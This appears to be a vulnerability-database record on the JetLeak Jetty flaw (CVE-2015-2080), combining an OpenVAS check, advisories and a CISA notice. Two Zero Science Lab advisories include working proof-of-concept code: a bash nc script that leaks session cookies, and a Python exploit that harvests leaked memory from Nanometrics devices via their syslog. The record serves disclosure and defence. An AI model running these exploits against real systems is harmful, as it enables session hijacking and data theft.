"bulletinFamily": "scanner", "cvelist": ["CVE-2015-2080"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-07-07T00:00:00", "id": "OPENVAS:1361412562310869526", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869526", "type": "openvas", "title": "Fedora Update for jetty FEDORA-2015-2673", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for jetty FEDORA-2015-2673\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869526\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-07 06:22:17 +0200 (Tue, 07 Jul 2015)\");\n script_cve_id(\"CVE-2015-2080\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for jetty FEDORA-2015-2673\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jetty'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"jetty on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-2673\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-March/151804.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"jetty\", rpm:\"jetty~9.2.9~1.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "github": [{"lastseen": "2020-03-10T23:26:07", "bulletinFamily": "software", "cvelist": ["CVE-2015-2080"], "description": "The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak.", "edition": 2, "modified": "2019-07-03T21:02:04", "published": "2018-11-09T17:50:00", "id": "GHSA-GHGJ-3XQR-6JFM", "href": "https://github.com/advisories/GHSA-ghgj-3xqr-6jfm", "title": "Moderate severity vulnerability that affects org.eclipse.jetty:jetty-server", "type": "github", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zeroscience": [{"lastseen": "2020-11-06T21:17:27", "description": "Title: Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers \nAdvisory ID: [ZSL-2016-5306](<ZSL-2016-5306.php>) \nType: Local/Remote \nImpact: Exposure of System Information, Exposure of Sensitive Information \nRisk: (3/5) \nRelease Date: 16.02.2016 \n\n\n##### Summary\n\nIgnition is a powerful industrial application platform with fully integrated development tools for building SCADA, MES, and IIoT solutions. \n\n##### Description\n\nRemote unauthenticated atackers are able to read arbitrary data from other HTTP sessions because Ignition uses a vulnerable Jetty server. When the Jetty web server receives a HTTP request, the below code is used to parse through the HTTP headers and their associated values. The server begins by looping through each character for a given header value and checks the following: \n \n\\- On Line 1164, the server checks if the character is printable ASCII or not a valid ASCII character. \n\\- On Line 1172, the server checks if the character is a space or tab. \n\\- On Line 1175, the server checks if the character is a line feed. \n\\- If the character is non-printable ASCII (or less than 0x20), then all of the checks above are skipped over and the code throws an 'IllegalCharacter' exception on line 1186, passing in the illegal character and a shared buffer. \n \n\\-------------------------------------------------------------------------------- \n \n` File: jetty-http\\src\\main\\java\\org\\eclipse\\jetty\\http\\HttpParser.java \n--------------------------------------------------------------------------- \n920: protected boolean parseHeaders(ByteBuffer buffer) \n921: { \n[..snip..] \n1163: case HEADER_VALUE: \n1164: if (ch>HttpTokens.SPACE || ch<0) \n1165: { \n1166: _string.append((char)(0xff&ch)); \n1167: _length=_string.length(); \n1168: setState(State.HEADER_IN_VALUE); \n1169: break; \n1170: } \n1171: \n1172: if (ch==HttpTokens.SPACE || ch==HttpTokens.TAB) \n1173: break; \n1174: \n1175: if (ch==HttpTokens.LINE_FEED) \n1176: { \n1177: if (_length > 0) \n1178: { \n1179: _value=null; \n1180: _valueString=(_valueString==null)?takeString():(_valueString+\" \"+takeString()); \n1181: } \n1182: setState(State.HEADER); \n1183: break; \n1184: } \n1185: \n1186: throw new IllegalCharacter(ch,buffer); \n` \n\\-------------------------------------------------------------------------------- \n \n\n\n##### Vendor\n\nInductive Automation - <http://www.inductiveautomation.com>\n\n##### Affected Version\n\n7.8.1 (b2016012216) and 7.8.0 (b2015101414) \n\n##### Tested On\n\nMicrosoft Windows 7 Professional SP1 (EN) \nMicrosoft Windows 7 Ultimate SP1 (EN) \nUbuntu Linux 14.04 \nMac OS X \nHP-UX Itanium \nJetty(9.2.z-SNAPSHOT) \nJava/1.8.0_73 \nJava/1.8.0_66 \n\n##### Vendor Status\n\n[14.01.2016] Vulnerability discovered. \n[20.01.2016] Vendor contacted. \n[15.02.2016] No response from the vendor. \n[16.02.2016] Public security advisory released. \n[22.02.2016] Vendor informs that version 7.8.1 is patched with Jetty 9.3.3v20150827. \n\n##### PoC\n\n[ignition_bufferbleed.txt](<../../codes/ignition_bufferbleed.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html> \n[2] <https://github.com/GDSSecurity/Jetleak-Testing-Script/blob/master/jetleak_tester.py> \n[3] <http://git.eclipse.org/c/jetty/org.eclipse.jetty.project.git/plain/advisories/2015-02-24-httpparser-error-buffer-bleed.md> \n[4] <https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md> \n[5] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2080> \n[6] <https://cxsecurity.com/issue/WLB-2016020156> \n[7] <https://packetstormsecurity.com/files/135804> \n[8] <https://www.exploit-db.com/exploits/39455/> \n[9] <http://www.vfocus.net/art/20160222/12576.html> \n[10] [https://www.incibe.es/securityAdvice/CERT_en/ics_advisories/Inductive_Automation_Ignition](<https://www.incibe.es/securityAdvice/CERT_en/Early_warning/ics_advisories/Fuga_datos_Inductive_Automation_Ignition>)\n\n##### Changelog\n\n[16.02.2016] - Initial release \n[17.02.2016] - Added reference [6] and [7] \n[18.02.2016] - Added reference [8] \n[22.02.2016] - Added vendor status and reference [9] and [10] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "edition": 13, "published": "2016-02-16T00:00:00", "title": "Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers", "type": "zeroscience", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2080"], "modified": "2016-02-16T00:00:00", "id": "ZSL-2016-5306", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php", "sourceData": "\r\nInductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers\r\n\r\n\r\nVendor: Inductive Automation\r\nProduct web page: http://www.inductiveautomation.com\r\nAffected version: 7.8.1 (b2016012216) and 7.8.0 (b2015101414)\r\nPlatform: Java\r\n\r\nSummary: Ignition is a powerful industrial application platform with\r\nfully integrated development tools for building SCADA, MES, and IIoT\r\nsolutions.\r\n\r\nDesc: Remote unauthenticated atackers are able to read arbitrary data\r\nfrom other HTTP sessions because Ignition uses a vulnerable Jetty server.\r\nWhen the Jetty web server receives a HTTP request, the below code is used\r\nto parse through the HTTP headers and their associated values. The server\r\nbegins by looping through each character for a given header value and checks\r\nthe following:\r\n\r\n- On Line 1164, the server checks if the character is printable ASCII or\r\nnot a valid ASCII character.\r\n- On Line 1172, the server checks if the character is a space or tab.\r\n- On Line 1175, the server checks if the character is a line feed.\r\n- If the character is non-printable ASCII (or less than 0x20), then all\r\nof the checks above are skipped over and the code throws an 'IllegalCharacter'\r\nexception on line 1186, passing in the illegal character and a shared buffer.\r\n\r\n\r\n---------------------------------------------------------------------------\r\nFile: jetty-http\\src\\main\\java\\org\\eclipse\\jetty\\http\\HttpParser.java\r\n---------------------------------------------------------------------------\r\n920: protected boolean parseHeaders(ByteBuffer buffer)\r\n921: {\r\n[..snip..]\r\n1163: case HEADER_VALUE:\r\n1164: if (ch>HttpTokens.SPACE || ch<0)\r\n1165: {\r\n1166: _string.append((char)(0xff&ch));\r\n1167: _length=_string.length();\r\n1168: setState(State.HEADER_IN_VALUE);\r\n1169: break;\r\n1170: }\r\n1171:\r\n1172: if (ch==HttpTokens.SPACE || ch==HttpTokens.TAB)\r\n1173: break;\r\n1174:\r\n1175: if (ch==HttpTokens.LINE_FEED)\r\n1176: {\r\n1177: if (_length > 0)\r\n1178: {\r\n1179: _value=null;\r\n1180: _valueString=(_valueString==null)?takeString():(_valueString+\" \"+takeString());\r\n1181: }\r\n1182: setState(State.HEADER);\r\n1183: break;\r\n1184: }\r\n1185:\r\n1186: throw new IllegalCharacter(ch,buffer);\r\n---------------------------------------------------------------------------\r\n\r\n\r\nTested on: Microsoft Windows 7 Professional SP1 (EN)\r\n Microsoft Windows 7 Ultimate SP1 (EN)\r\n Ubuntu Linux 14.04\r\n Mac OS X\r\n HP-UX Itanium\r\n Jetty(9.2.z-SNAPSHOT)\r\n Java/1.8.0_73\r\n Java/1.8.0_66\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2016-5306\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php\r\n\r\nCVE: CVE-2015-2080\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2080\r\n\r\nOriginal: http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html\r\nJetleak Test script: https://github.com/GDSSecurity/Jetleak-Testing-Script/blob/master/jetleak_tester.py\r\nEclipse: http://git.eclipse.org/c/jetty/org.eclipse.jetty.project.git/plain/advisories/2015-02-24-httpparser-error-buffer-bleed.md\r\n https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md\r\n\r\n\r\n14.01.2016\r\n\r\n---\r\n\r\n\r\n#######################\r\n#!/bin/bash\r\n\r\n#RESOURCEPATH=\"/main/web/config/alarming.schedule?4674-1.IBehaviorListener.0-demo\"\r\nRESOURCEPATH=\"/main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo\"\r\nBAD=$'\\a'\r\n\r\nfunction normalRequest {\r\necho \"-- Normal Request --\"\r\n\r\nnc localhost 8088 << NORMREQ\r\nPOST $RESOURCEPATH HTTP/1.1\r\nHost: localhost\r\nContent-Type: application/x-www-form-urlencoded;charset=utf-8\r\nConnection: close\r\nContent-Length: 63\r\n\r\nNORMREQ\r\n}\r\n\r\nfunction badCookie {\r\necho \"-- Bad Cookie --\"\r\n\r\nnc localhost 8088 << BADCOOKIE\r\nGET $RESOURCEPATH HTTP/1.1\r\nHost: localhost\r\nCoo${BAD}kie: ${BAD}\r\n\r\nBADCOOKIE\r\n}\r\n\r\nnormalRequest\r\necho \"\"\r\necho \"\"\r\nbadCookie\r\n\r\n#######################\r\n\r\n\r\n\r\nOriginal raw analysis request via proxy using Referer:\r\n------------------------------------------------------\r\n\r\nGET /main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo&_=1452849939485 HTTP/1.1\r\nHost: localhost:8088\r\nAccept: application/xml, text/xml, */*; q=0.01\r\nX-Requested-With: XMLHttpRequest\r\nWicket-Ajax: true\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36\r\nWicket-Ajax-BaseURL: config/conf.modules?51461\r\nReferer: \\x00\r\n\r\n\r\nResponse leaking part of Cookie session:\r\n----------------------------------------\r\n\r\nHTTP/1.1 400 Illegal character 0x0 in state=HEADER_VALUE in 'GET /main/web/con...461\\r\\nReferer: \\x00<<<\\r\\nAccept-Encoding...tion: close\\r\\n\\r\\n>>>SESSIONID=15iwe0g...\\x0fCU\\xFa\\xBf\\xA4j\\x12\\x83\\xCb\\xE61~S\\xD1'\r\nContent-Length: 0\r\nConnection: close\r\nServer: Jetty(9.2.z-SNAPSHOT)\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/ignition_bufferbleed.txt"}, {"lastseen": "2020-11-06T21:17:46", "description": "Title: Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit \nAdvisory ID: [ZSL-2020-5562](<ZSL-2020-5562.php>) \nType: Local/Remote \nImpact: System Access, DoS, Exposure of System Information, Exposure of Sensitive Information \nRisk: (5/5) \nRelease Date: 15.02.2020 \n\n\n##### Summary\n\nThe Centaur digital recorder is a portable geophysical sensing acquisition system that consists of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities. Its ease of use simplifies high performance geophysical sensing deployments in both remote and networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for infrasound and similar geophysical sensor recording applications requiring sample rates up to 5000 sps. \n \nThe TitanSMA is a strong motion accelerograph designed for high precision observational and structural engineering applications, where scientists and engineers require exceptional dynamic range over a wide frequency band. \n\n##### Description\n\nAn information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT) suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224. As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage. Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent packet) which can be combined to leak sensitive data which can be used to perform session hijacking and authentication bypass scenarios. \n\n##### Vendor\n\nNanometrics Inc. - <https://www.nanometrics.ca>\n\n##### Affected Version\n\nCentaur <= 4.3.23 \nTitanSMA <= 4.2.20 \n\n##### Tested On\n\nJetty 9.4.z-SNAPSHOT \n\n##### Vendor Status\n\n[10.02.2020] Vulnerabilities discovered. \n[10.02.2020] Vendor contacted. \n[14.02.2020] No response from the vendor. \n[15.02.2020] Public security advisory released. \n\n##### PoC\n\n[centaur3.py](<../../codes/centaur3.txt>)\n\n##### Credits\n\nVulnerability discovered by byteGoblin - <[bytegoblin@zeroscience.mk](<mailto:bytegoblin@zeroscience.mk>)>\n\n##### References\n\n[1] <https://nvd.nist.gov/vuln/detail/CVE-2015-2080> \n[2] <https://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php> \n[3] <https://packetstormsecurity.com/files/156387> \n[4] <https://cxsecurity.com/issue/WLB-2020020091> \n[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/176352> \n[6] <https://www.exploit-db.com/exploits/48098> \n[7] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12134> \n[8] <https://nvd.nist.gov/vuln/detail/CVE-2020-12134>\n\n##### Changelog\n\n[15.02.2020] - Initial release \n[19.02.2020] - Added reference [3], [4], [5] and [6] \n[26.04.2020] - Added reference [7] and [8] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "edition": 1, "published": "2020-02-15T00:00:00", "title": "Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit", "type": "zeroscience", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-12134", "CVE-2015-2080"], "modified": "2020-02-15T00:00:00", "id": "ZSL-2020-5562", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php", "sourceData": "#!/usr/bin/env python3\n#\n# Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit\n#\n#\n# Vendor: Nanometrics Inc.\n# Product page: https://www.nanometrics.ca/products/accelerometers/titan-sma\n# Product page: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder\n#\n# Affected versions:\n# Centaur <= 4.3.23\n# TitanSMA <= 4.2.20\n#\n# Summary:\n# The Centaur Digital Recorder is a portable geophysical sensing acquisition system that consists\n# of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities.\n# Its ease of use simplifies high performance geophysical sensing deplayments in both remote and\n# networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for\n# infrasound and similar geophysical sensor recording applications requiring sample rates up to\n# 5000 sps.\n#\n# Summary:\n# The TitanSMA is a strong motion accelerograph designed for high precision observational and\n# structural engineering applications, where scientists and engineers require exceptional dynamic\n# range over a wide frequency band.\n#\n# Description:\n# An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect\n# critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT)\n# suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224.\n# As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage.\n# Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP\n# packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system\n# logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent\n# packet) which can be combined to leak sensitive data which can be used to perform session hijacking\n# and authentication bypass scenarios.\n#\n# Tested on:\n# Jetty 9.4.z-SNAPSHOT\n#\n# Vulnerability discovered by:\n# byteGoblin @ zeroscience.mk\n#\n#\n# Advisory ID: ZSL-2020-5562\n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php\n#\n# Related CVE: CVE-2015-2080\n# Related CWE: CWE-532, CWE-538\n#\n# 10.02.2020\n#\n\nimport requests\nimport re\nimport sys\n\nclass Goblin:\n def __init__(self):\n self.host = None\n self.page = \"/zsl\"\n self.syslog = \"/logs/syslog\"\n self.buffer_pad = \"A\" * 70\n self.buffer = None\n self.payload = \"\\xFF\"\n self.payloads_to_send = 70 # 70 seems to be a good number before we get weird results\n self.body = {}\n self.headers = None\n self.syslog_data = {}\n self.last_line = None\n self.before_last_line = True\n\n def banner(self):\n goblin = \"\"\"\n NN \n NkllON \n 0;;::k000XN KxllokN \n 0;,:,;;;;:ldK Kdccc::oK \n Nx,';codddl:::dkdc:c:;lON \n klc:clloooooooc,.':lc;'lX \n x;:ooololccllc:,:ll:,:xX \n Kd:cllc'..';:ccclc,.x _ . ___ _ . \n NOoc::c:,'';:ccllc::''k \\ ___ , . _/_ ___ .' \\ __. \\ ___ | ` , __ \n Nklc:clccc;.;odoollc:',xN |/ \\ | ` | .' ` | .' \\ |/ \\ | | |' `.\n 0l:lollc:;:,.,ccllcc:;..cOKKX | ` | | | |----' | _ | | | ` | | | |\n 0c;lolc;'...',;;:::::;..:cc:,cK `___,' `---|. \\__/ `.___, `.___| `._.' `___,' /\\__ / / |\n Nc'clc;..,,,:::c:;;;,'..:oddoc;c0 \\___/ \n Nl';;,:,.;:,;:;;;,'.....cccc:;..x InTrOdUcEs: //Nano-Bleed//\n XxclkXk;'::,,,''';:::;'''...'',:o0 \n Kl,''',:cccccc:;..';;;:cc;;dX Discovered / Created by: byteGoblin\n O,.,;;,;:::::;;,,;::,.';:c';K contact: bytegoblin <at> zeroscience.mk\n Kdcccccdl'';;..'::;;,,,;:::;,'..;:.;K \n d;,;;'...',,,:,..,;,',,;;,,,'.cd,':.;K Vendor: Nanometrics Inc. - nanometrics.ca\n Oddl',,'',:cxX0:....'',,''..;dKKl,;,,xN Product: Centaur, TitanSMA\n d...'ckN Xkl:,',:clll:,..,cxd;,::,,xN Affected versions: <= 4.3.23, <= 4.3.20\n 0:',';k Xx:,''..,cccc::c:'.';:;..,;,lK\n 0:'clc':o;',;,,.';loddolc;'.,cc'.;olkN CVE: N/A\n 0:'cdxdc,..';..,lOo,:clc:'.,:ccc;.oN Advisory: ZSL-2020-5562 / zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php\n :,;okxdc,..,,..lK Xkol;:x0kl;;::;':0 \n x:,:odo:,'.',,.'xN 0lk Nk;';:;.cN Description: Unauthenticated Remote Memory Leak in Nanometrics Centaur product\n Xx:,'':xk:..,''lK Y k;';;';xX \n XOkkko'.....'O d.';;,,:xN\n 0dooooooxX x'.'''',oK _.o-'( Shout-out to the bois: LiquidWorm, 0nyxd, MemeQueen, Vaakos, Haunt3r )'-o._\n XOkkkkkON \n \"\"\"\n print(goblin)\n\n def generate_payload(self, amount_of_bytes):\n self.payload += \"\\x00\" * amount_of_bytes\n self.headers = {\"Cookie\": self.buffer_pad, \"Referer\": self.payload}\n\n def read_syslog(self, initial=False):\n # Read syslog remotely and filter out 'HeapByteBuffer' messages.\n # 'initial' is used to make a 'snapshot' of the state before we send payloads...\n # That way we can filter on what we've just sent.\n print(\"[!] - Grabbing syslog from: {}{}\".format(self.host, self.syslog))\n buffer = \"\"\n r = requests.get(self.host + self.syslog)\n if r.status_code == 200:\n print(\"[!] - We got syslog, it is: {} bytes\".format(len(r.content)))\n split = r.text.split(\"\\n\")\n for line in split:\n if \"HeapByteBuffer\" in line:\n if initial:\n self.last_line = line\n else:\n if line == self.last_line:\n self.before_last_line = False\n if not self.before_last_line:\n buffer_addr = re.search(\"\\@\\w+\", line).group(0).strip(\"@\")\n try:\n leak = re.search(\">>>.+(?=\\.\\.\\.)\", line).group(0).strip(\">>>\")\n buffer += leak\n except Exception as e:\n print(e)\n if initial:\n return self.last_line\n self.buffer = buffer\n else: # we can't access syslog?\n print(\"[!!!] - Yoooo... we can't access syslog? Make sure you can access it, dawg...\")\n print(\"[!!!] - The status code we got was: {}\".format(r.status_code))\n exit(-1)\n\n def show_output(self):\n # we need to translate '\\r\\n' into actual newlines\n if self.buffer is not None and self.buffer is not \"\":\n self.buffer = self.buffer.replace(\"\\\\n\", \"\\n\")\n self.buffer = self.buffer.replace(\"\\\\r\", \"\\r\")\n self.buffer = self.buffer.replace(\"%2f\", \"/\")\n\n print(\"[*] BUFFER LENGTH: {}\".format(len(self.buffer)))\n print(\"=\" * 50)\n print(\"[*] THIS IS THE LOOT\")\n print(\"=\" * 50)\n for num, x in enumerate(self.buffer.split(\"\\n\")):\n print(\"{}.\\t| \\t{}\".format(num, x))\n\n def send_payload(self, amount):\n print(\"[!] - Sending payloads to target: {}{}\".format(self.host, self.page))\n if amount > self.payloads_to_send or amount < 0:\n amount = self.payloads_to_send\n for num, x in enumerate(range(0, amount)):\n if num % 10 == 0:\n print(\"[!] - [{}/{}] payloads sent...\".format(num, amount))\n try:\n self.generate_payload(17)\n r = requests.post(self.host + self.page, data=self.body, headers=self.headers)\n except Exception as e:\n print(e)\n print(\"[!] - [{}/{}] payloads sent...\".format(amount, amount))\n\n def parse_sys_args(self):\n if len(sys.argv) >= 2:\n self.host = sys.argv[1]\n if not \"http\" in self.host:\n self.host = \"http://{}\".format(self.host)\n if len(sys.argv) == 3:\n # amount of packets to send\n self.payloads_to_send = sys.argv[2]\n else:\n self.print_help()\n\n def print_help(self):\n print(\"Usage: {} <ip_addr[:port]> [amount of payloads to send]\".format(sys.argv[0]))\n print(\"Example: centaur3.py 123.456.789.0:8080 200\")\n print(\"\\tThis will send 200 payloads to the aforementioned host\")\n print(\"\\tThe [port] and [amount of payloads] are optional\")\n exit(-1)\n\n def main(self):\n self.parse_sys_args()\n self.banner()\n ll = self.read_syslog(initial=True)\n self.send_payload(70)\n self.read_syslog()\n self.show_output()\n\nif __name__ == '__main__':\n Goblin().main()\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/centaur3.txt"}], "cisa": [{"lastseen": "2020-12-18T18:07:17", "bulletinFamily": "info", "cvelist": ["CVE-2015-2080", "CVE-2017-1000385", "CVE-2018-0016", "CVE-2018-0017", "CVE-2018-0018", "CVE-2018-0019", "CVE-2018-0020", "CVE-2018-0022", "CVE-2018-0023"], "description": "Juniper Networks has released security updates to address vulnerabilities affecting multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.\n\nNCCIC encourages users and administrators to review the following Juniper Security Advisories and apply necessary updates:\n\n * [Junos OS](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10844&cat=SIRT_1&actp=LIST>): Kernel crash upon receipt of crafted CLNP packets (CVE-2018-0016)\n * [SRX Series](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10845&cat=SIRT_1&actp=LIST>): Denial-of-service vulnerability in flowd daemon on devices configured with NAT-PT (CVE-2018-0017)\n * [SRX Series](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10846&cat=SIRT_1&actp=LIST>): Crafted packet may lead to information disclosure and firewall rule bypass during compilation of IDP policies (CVE-2018-0018)\n * [Junos](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10847&cat=SIRT_1&actp=LIST>): Denial-of-service vulnerability in SNMP MIB-II subagent daemon (mib2d) (CVE-2018-0019)\n * [Junos OS](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10848&cat=SIRT_1&actp=LIST>): rpd daemon cores due to malformed BGP UPDATE packet (CVE-2018-0020)\n * [Steel-Belted Radius Carrier](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10849&cat=SIRT_1&actp=LIST>): Eclipse Jetty information disclosure vulnerability (CVE-2015-2080)\n * [NorthStar](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10850&cat=SIRT_1&actp=LIST>): Return of Bleichenbacher\u2019s Oracle Threat (ROBOT) RSA SSL attack (CVE-2017-1000385)\n * [OpenSSL](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10851&cat=SIRT_1&actp=LIST>): Multiple vulnerabilities resolved in OpenSSL\n * [Junos OS](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10852&cat=SIRT_1&actp=LIST>): Multiple vulnerabilities in stunnel 5.38\n * [NSM Appliance](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10853&cat=SIRT_1&actp=LIST>): Multiple vulnerabilities resolved in CentOS 6.5-based 2012.2R12 release\n * [Junos OS](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10854&cat=SIRT_1&actp=LIST>): Short MacSec keys may allow man-in-the-middle attacks\n * [Junos OS](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10855&cat=SIRT_1&actp=LIST>): Mbuf leak due to processing MPLS packets in VPLS networks (CVE-2018-0022)\n * [Junos Snapshot Administrator (JSNAPy)](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10856&cat=SIRT_1&actp=LIST>) world writeable default configuration file permission (CVE-2018-0023)\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ncas/current-activity/2018/04/12/Juniper-Networks-Releases-Security-Updates>); we'd welcome your feedback.\n", "modified": "2018-04-12T00:00:00", "published": "2018-04-12T00:00:00", "id": "CISA:32998D667194BA67A58624AE4C787D0A", "href": "https://us-cert.cisa.gov/ncas/current-activity/2018/04/12/Juniper-Networks-Releases-Security-Updates", "type": "cisa", "title": "Juniper Networks Releases Security Updates", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}]}
